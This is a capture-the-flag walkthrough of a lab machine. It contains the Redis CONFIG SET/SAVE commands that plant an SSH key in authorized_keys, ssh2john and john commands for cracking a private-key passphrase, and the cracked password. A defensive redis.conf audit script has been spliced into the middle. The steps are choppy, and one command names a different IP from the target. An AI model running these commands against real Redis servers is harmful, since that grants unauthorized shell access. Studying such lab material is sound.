Nothing interesting over here, just a static web page with no functionality.
https://10.10.10.160:10000
There is a login page powered by Webmin; out of the box, Webmin has no default credentials.
I also tried SQL and NoSQL injection ...... no benefit. We will come back here after a while.
/upload
Just a bunch of images; almost none of them open or contain anything interesting .... I moved on.
redis 6379
We can connect to Redis using just netcat, with no authentication, and execute commands.
shell as redis
I created an SSH public/private key pair and then used the Redis server to import and save the public key into authorized_keys. After that, just SSH into the system as the redis user, and we got the shell.
Importing the SSH key :-
Saving the SSH key in authorized_keys :-
privesc redis => Matt
linpeas.sh
I found an SSH RSA private key for the Matt user, so I first used it for direct SSH login ...... didn't work.
Next, I extracted the key contents (hash) using ssh2john; we can also extract that online.
After extracting the hash from the key, we need to crack it; for this I used john.
I used the key and the password and ........ I still failed,
so I tried "su - Matt" in the shell I already had and succeeded ...... got the shell as Matt.
privesc Matt => root
These credentials also work for the web page we found earlier,
but we kind of need a Metasploit payload to do that, so I just skipped it.
# load the public key into Redis as the value of key new_key.txt (-x reads the value from stdin)
cat new_key.txt | redis-cli -h 10.85.0.52 -x set new_key.txt
# point the RDB dump at the redis user's .ssh directory, name it authorized_keys, and write it
redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
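The fix on the defender's side is to keep Redis off the network and unable to run CONFIG/SAVE for arbitrary clients. The following audit script is an added example, not part of the original writeup: it parses a redis.conf and flags the settings that made the authorized_keys write above possible, using constructed weak and hardened sample configs (the password value is a placeholder).

```python
"""Audit a redis.conf for the settings that let an unauthenticated client write
arbitrary files via CONFIG SET dir/dbfilename + SAVE (added example, constructed)."""

# Constructed sample: permissive settings like those the writeup abused.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
dir /var/lib/redis
"""

# Constructed hardened counterpart: loopback only, auth required,
# and the two commands needed for the file write disabled.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass <strong-password-placeholder>
rename-command CONFIG ""
rename-command SAVE ""
dir /var/lib/redis
"""

def parse_conf(text):
    """Map each directive to a list of argument lists (directives may repeat)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text):
    """Return a list of findings; an empty list means no weakness was spotted."""
    conf = parse_conf(text)
    findings = []
    # No bind directive means Redis listens on every interface.
    binds = [a for args in conf.get("bind", [["0.0.0.0"]]) for a in args]
    if any(not b.startswith(("127.", "::1", "-::1", "localhost")) for b in binds):
        findings.append("listens on a non-loopback interface: " + " ".join(binds))
    if conf.get("protected-mode", [["yes"]])[0][0].lower() != "yes":
        findings.append("protected-mode disabled")
    if "requirepass" not in conf:
        findings.append("no requirepass: any client reaching the port may run CONFIG/SAVE")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in ("CONFIG", "SAVE"):
        if cmd not in renamed:
            findings.append(cmd + " command not renamed or disabled")
    return findings
```

Running `audit()` over the live config (and confirming the redis user has no login shell) is a quick check that the write-to-authorized_keys path is closed.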
# convert the private key into a john-compatible hash, then crack it with a wordlist
python ssh2john.py matt_ssh.key > hash.txt
john --wordlist=~/chaos/rockyou.txt hash.txt
>>
computer2008